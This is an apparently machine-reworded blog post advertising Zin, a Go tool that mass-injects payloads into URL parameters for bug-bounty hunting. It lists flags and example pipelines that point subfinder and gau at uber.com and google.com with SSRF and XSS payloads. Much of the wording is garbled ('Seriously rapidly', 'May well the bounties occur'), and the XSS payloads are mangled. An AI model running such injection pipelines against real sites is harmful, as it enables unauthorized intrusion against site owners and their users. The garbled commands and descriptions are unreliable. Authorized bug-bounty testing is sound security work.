Zin – A Payload Injector For Bugbounties Written In Go

Zin - A Payload Injector For Bugbounties Written In Go

A Payload Injector for bugbounties published in go


Features

  • Inject various payloads into all parameters
  • Inject single payloads into all parameters
  • Will save responses into output folder
  • Shows Status Code & Response Size
  • Can grep for patterns in the response
  • Seriously rapidly
  • Simple to setup

Set up

$ go get -u github.com/ethicalhackingplayground/Zin

New Functions

Sample Matching in responses

Match Position Codes

Arguments

      _
(_)
_____ _ __
|_ / | '_
/ /| | | | |
/___|_|_| |_|


May well the bounties occur


-c int
the concurrency (default 20)
-g string
grep the response for any matches
-p string
the payload to be utilised
-pL string
the record of payloads to be utilized
-s int
filter by status codes (default 200)

SSRF Example

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS Illustration

$ subfinder uber.com | gau| Zin -c 80 -p '">notify(matchforthis)script>' -g "matchforthis"

Inject Several Payloads

$ cat hosts | gau | grep "&" | Zin -c 80 -pL

Subdomain Scanning

$ subfinder -dL domains --silent | gau | Zin -c 80 -p

Only Take a look at Parameters

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '">notify(matchthis)</script<"' -g "matchthis"

Multiple Hosts

$ cat hosts | gau | Zin -c 80 -p

Source url

Read through Much more on Pentesting Applications

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *